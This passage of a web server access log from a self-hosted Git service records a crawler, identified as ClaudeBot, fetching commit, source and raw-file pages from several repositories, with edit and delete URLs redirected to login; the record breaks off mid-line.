"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json?display=source" [Client 216.73.216.188] [Length 11059] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 22670] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-2_error.log" [Client 216.73.216.188] [Length 25418] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2FMIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 35921] [Gzip 7.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 216.73.216.188] [Length 14244] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fservices%2FgeminiService.ts" [Client 216.73.216.188] [Length 25022] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fletsencrypt-requests_error.log" [Client 216.73.216.188] [Length 21204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 26524] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11395] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md?display=source" [Client 216.73.216.188] [Length 22114] [Gzip 6.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 216.73.216.188] [Length 14206] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.AssemblyInfoInputs.cache" [Client 216.73.216.188] [Length 21171] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2F.gitignore" [Client 216.73.216.188] [Length 23325] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml" [Client 216.73.216.188] [Length 96358] [Gzip 10.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 216.73.216.188] [Length 12998] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fpython3" [Client 216.73.216.188] [Length 23669] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html" [Client 216.73.216.188] [Length 14387] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 216.73.216.188] [Length 11040] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/App.tsx" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fpython" [Client 216.73.216.188] [Length 23641] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/css" [Client 216.73.216.188] [Length 10075] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11895] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/App.tsx" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 216.73.216.188] [Length 14240] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/css/style.css" [Client 216.73.216.188] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/script.js" [Client 216.73.216.188] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" [Client 216.73.216.188] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" [Client 216.73.216.188] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 13027] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 19400] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 23428] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile?display=source" [Client 216.73.216.188] [Length 11595] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=source" [Client 216.73.216.188] [Length 12001] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-1_error.log" [Client 216.73.216.188] [Length 26522] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 10120] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py?display=source" [Client 216.73.216.188] [Length 13020] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11901] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good?display=source" [Client 216.73.216.188] [Length 16213] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16091] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 23326] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fapp%2Ffetcher.py.claude" [Client 216.73.216.188] [Length 28728] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11895] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-4_error.log" [Client 216.73.216.188] [Length 25731] [Gzip 5.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 20702] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 173129] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Fproxy-host-3_error.log" [Client 216.73.216.188] [Length 23117] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fdata%2Flogs%2Ffallback_http_access.log" [Client 216.73.216.188] [Length 26182] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 11243] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html?display=source" [Client 216.73.216.188] [Length 14408] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fimport_csv.py" [Client 216.73.216.188] [Length 27403] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" [Client 216.73.216.188] [Length 10085] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 216.73.216.188] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 216.73.216.188] [Length 14387] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 216.73.216.188] [Length 11049] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 24895] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 